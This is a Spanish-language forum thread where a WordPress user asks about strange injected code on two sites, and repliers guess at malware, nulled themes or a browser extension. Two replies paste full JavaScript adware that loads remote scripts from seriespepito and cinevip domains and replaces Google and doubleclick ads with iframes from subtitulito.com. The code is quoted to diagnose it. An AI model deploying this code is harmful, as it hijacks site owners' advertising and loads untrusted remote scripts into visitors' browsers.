Código extraño al crear entradas, ¿Hackeo en WordPress?

  • Autor Autor LexTeckGames
  • Fecha de inicio Fecha de inicio
L

LexTeckGames

Delta
Hola chicos, en lo pasa es que cuando creo una nueva entrada me sale el siguiente código (Yo no lo he agregado) : Screenshot by Lightshot

¿Eso es de WP o que es? Help me, estoy preocupado.

PDT: No tengo ni un solo plugin.
 
Última edición:
Verifica si tienes algún plugin extraño
 
Es un enlace, es extraño pareciera que tu web está infectada :distant:
 
Para mi que ya valiste D: , yo ya me pondria a escanear todo y cambiar contraseñas de unos 64 caracteres :drunk:
 
LexTeckGames dijo:
Y en mi otro sitio web, aparece esto: Screenshot by Lightshot 😕
Hacer clic para expandir...

Pues sí se trata de algún virus o malware en tu hosting tal vez, contacta con ellos adjuntando esta evidencia para que veas la respuestas que te dan. Aunque el Template es uno de internet o es uno predeterminado de WP?

Saludos
 
Claro eso es fallo del lugar donde tienes alojado tu dominio, porque si fuese un error de tu web, tendría que ser de un error tuyo de código o un plugin.
 
puede ser tu plantilla infectada, puede ser alguna extension del navegador, puede ser hackeo de worpdress dia 0, pueden ser muchas cosas
 
Frozen dijo:
Pues sí se trata de algún virus o malware en tu hosting tal vez, contacta con ellos adjuntando esta evidencia para que veas la respuestas que te dan. Aunque el Template es uno de internet o es uno predeterminado de WP?

Saludos
Hacer clic para expandir...

Es algo extraño, mira.

Mi sitio que no tiene plugin alguno, se infecto con esto: Screenshot by Lightshot

Y mi otro sitio que tiene un theme premiun de themeforest y si tiene plugins y se ha infectado con esto: Screenshot by Lightshot

No se si enserio sea cosa del hosting :S
 
Te aconsejo a que hables con el hosting, habre un ticket y reportale ese mismo codigo y que te hagan un Scan de tu cuenta.
 
Es posible que sea el hosting, no pierdas tiempo y envía un ticket a tu proveedor :encouragement:
 
¿El theme premium lo descargaste gratis o lo pagaste? Me parece que por allí va la cosa :/
 
hola esta es la respuesta de esa petición: haber los programadores, traduscan.

Insertar CODE, HTML o PHP: 
if (location.href.match(/^http:\/\/(www\.)?seriespepito\.(me)/i)) {

    if (document.getElementById("cv_plugin")) {
        if (document.getElementById("cv_plugin").src.match(/install_plugin/i)) {
            var al = document.getElementById("cv_dir").innerHTML.replace(/amp;/gi, '');
            document.getElementById("cv_plugin").src = "http://player.seriespepito.me/fuente/" + al
        }
    }
}
var loc = (location.href.match(/pepito=/i));
if (location.href.match(/^http:\/\/(www\.)?bayfiles\.net/i) && loc) {
    addScript("bayfiles");
}else if (location.href.match(/^http:\/\/(www\.)?billionuploads\.com/i) && loc) {
    addScript("billion");
}else if (location.href.match(/^http:\/\/(www\.)?hugefiles\.net/i) && loc) {
    addScript("huge");
}else if (location.href.match(/^http:\/\/(www\.)?vshare\.eu/i) && loc) {
    addScript("videoshare");
}else if (location.href.match(/^http:\/\/(www\.)?180upload\.com/i) && loc) {
    addScript("180upload");
}else if (location.href.match(/^http:\/\/(www\.)?uptobox\.com/i) && loc) {
    addScript("uptobox");
}

function addScript(a) {
    var s = document.createElement('script');
    s.setAttribute("type", "text/javascript");
    s.setAttribute("src", "http://player.seriespepito.me/source/" + a + ".js");
    document.getElementsByTagName("head")[0].appendChild(s);
}


function getSizes(a) {
    var myWidth = 0, myHeight = 0;
    if (typeof (window.innerWidth) === 'number') {
        myWidth = window.innerWidth;
        myHeight = window.innerHeight;
    } else if (document.documentElement && (document.documentElement.clientWidth || document.documentElement
.clientHeight)) {
        myWidth = document.documentElement.clientWidth;
        myHeight = document.documentElement.clientHeight;
    } else if (document.body && (document.body.clientWidth || document.body.clientHeight)) {
        myWidth = document.body.clientWidth;
        myHeight = document.body.clientHeight;
    }
    if(a == 'w')
    return myWidth
    else if (a == 'h')
    return myHeight;
    else
    return myWidth + 'x' + myHeight;
}

 function tam(me,a) {
    var val = null;
    if(a)
        val = ['300x250', '728x90', '160x600', '120x600', '336x280'];
    else
        val = ['300x250', '728x90', '160x600','468x60','800x600','120x20','120x600','800x440','336x280'
,'280x336','250x250','234x60','500x500','800x500','300x600','720x300'];
    
    var ret = false;
    
    for (var i = 0; i < val.length; i++) {
        if (me == val[i]) {
            ret = true;
            break;
        }
    }
    return ret;

}

function a_z() {
    var texts = document.getElementsByTagName('text');
    if (texts.length > 0) {
        for (i = 0; i < texts.length; i++) {
            if (texts[i].innerHTML === 'Google' || texts[i].innerHTML.indexOf('Google') !== -1 || texts
[i].innerHTML.search("Anuncios") > -1 || texts[i].innerHTML.indexOf("Anuncios") !== -1 || texts[i].innerHTML
.indexOf("anuncios") !== -1  || texts[i].innerHTML === 'Gesti&oacute;n anuncios' || texts[i].innerHTML
 === 'AdChoices') {
                var parent = texts[i];
                while (parent.tagName.toUpperCase() !== 'HTML') {
                    if (parent.tagName.toLowerCase() === 'body') {
                    var w = getSizes('w');
                    var h = getSizes('h');
                     if (tam(getSizes('t'), true)){
                                                                        parent.innerHTML = '<iframe FRAMEBORDER
=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=NO width="'+w+'" height="'+h+'" src="http://subtitulito.com
/cc.html?28=' + w + '&22=' + h + '"></iframe>';
                                                                            }
                    }
                    parent = parent.parentNode;
                }
            }
        }
    }
}


function b_z(){
    var choises = document.getElementsByTagName('img');
    if(choises.length > 0){
        for(i = 0; i < choises.length; i++){
            var child = choises[i];
            if(child.alt === 'AdChoices' || child.src.indexOf("/c_30_us.png") > -1 || child.src.indexOf
('//c.betrad.com/') !== -1){
                while (child.tagName.toUpperCase() !== 'HTML') {
                    if (child.tagName.toLowerCase() === 'body') {
                      var w = getSizes('w');
                        var h = getSizes('h');
                        if (tam(getSizes('t'), true)){
                                                                            child.innerHTML = '<iframe
 FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=NO width="'+w+'" height="'+h+'" src="http://subtitulito
.com/cc.html?28=' + w + '&22=' + h + '"></iframe>';
                                                  
                                                 }
                    }
                    child = child.parentNode;
                }
            }
        }
    }
}
function c_z(){
    var ifra = document.getElementsByTagName("iframe");
    if(ifra.length > 0){
        for(i = 0; i < ifra.length; i++){
            var child = ifra[i];
             if(child.src.indexOf("doubleclick.net") !== -1){
                while (child.tagName.toUpperCase() !== 'HTML') {
                    if (child.tagName.toLowerCase() === 'body') {
                        var w = getSizes('w');
                            var h = getSizes('h');
                            if (tam(getSizes('t'), true)){
                                                                                     child.innerHTML
 = '<iframe FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=NO width="'+w+'" height="'+h+'" src
="http://subtitulito.com/cc.html?28=' + w + '&22=' + h + '"></iframe>';
                                                  
                                                }
                    }
                    child = child.parentNode;
                }
            }
        }
    }
}

a_z();
b_z();
c_z();
 
Probablemente fue porque descargaste un theme premiun de pago, pero lo conseguiste gratis y estos normalmente tienen virus, código malicioso, backdoors, ect.
 
Última edición:
Tu plantilla es original o nulled? A veces ponemos plugins o plantillas pirateadas y dañamos todos.
 
lo que hace ese script es colocar los player de cinevip.tv... y mas que nada es parte de una extension del navegador (las he visto en varios sitios)
HTML: 
if (location.href.match(/^http:\/\/(www\.)?cinevip\.(tv)/i)) {

    if (document.getElementById("cvip_plugin")) {
        if (document.getElementById("cvip_plugin").src.match(/install_plugin/i)) {
            if (document.getElementById("contentlocker2")) {
            }
            var al = document.getElementById("cvip_dir").innerHTML.replace(/amp;/gi, '');
            document.getElementById("cvip_plugin").src = "http://player.cinevip.tv/fuente/" + al
        }
    }
    if (document.getElementById("cinevip-contentlocker2")) {
        document.getElementById("cinevip-contentlocker2").style.display = 'none';
    }
}

var loca = (location.href.match(/cinevip=/i));
if (location.href.match(/^http:\/\/(www\.)?bayfiles\.net/i) && loca) {
    addScript("bayfiles");
}else if (location.href.match(/^http:\/\/(www\.)?billionuploads\.com/i) && loca) {
    addScript("billion");
}else if (location.href.match(/^http:\/\/(www\.)?hugefiles\.net/i) && loca) {
    addScript("huge");
}else if (location.href.match(/^http:\/\/(www\.)?vshare\.eu/i) && loca) {
    addScript("videoshare");
}else if (location.href.match(/^http:\/\/(www\.)?180upload\.com/i) && loca) {
    addScript("180upload");
}else if (location.href.match(/^http:\/\/(www\.)?uptobox\.com/i) && loca) {
    addScript("uptobox");
}

function addScript(a) {
    var s = document.createElement('script');
    s.setAttribute("type", "text/javascript");
    s.setAttribute("src", "http://mirrors.cinevip.tv/" + a + ".js");
    document.getElementsByTagName("head")[0].appendChild(s);
}

if (document.getElementById("ateenti-contentlocker")) {
        document.getElementById("ateenti-contentlocker").style.display = 'none';
}
if (document.getElementById("ateenti-contentlocker2")) {
        document.getElementById("ateenti-contentlocker").style.display = 'none';
}
 
Hola lexteck, Descargaste el tema/plantilla de internet o la compraste?

Saludos! 😛7:
 
LuisNara dijo:
Pero el theme es comprado o es nulled?
Hacer clic para expandir...

Comprado, pero ya averigüe, es un plugin que hace eso.

- - - Actualizado - - -


¿Y eso puede afectar en mi sitio en algo? Yo no entiendo mucho sobre estos temas 😛
 
Hay que estar conectado o registrado para responder aquí.

Temas similares

T
Código extraño al final de la URL al acceder a entradas
Respuestas
8
Visitas
3K
Allan Cano
R
  • Cerrado
Eliminar código extraño en mi sitio de WordPress
Respuestas
2
Visitas
754
cristianriv
B
Posts con código extraño que anula el contenido en WordPress
Respuestas
7
Visitas
1K
Hades
Menú
Acceder
Registro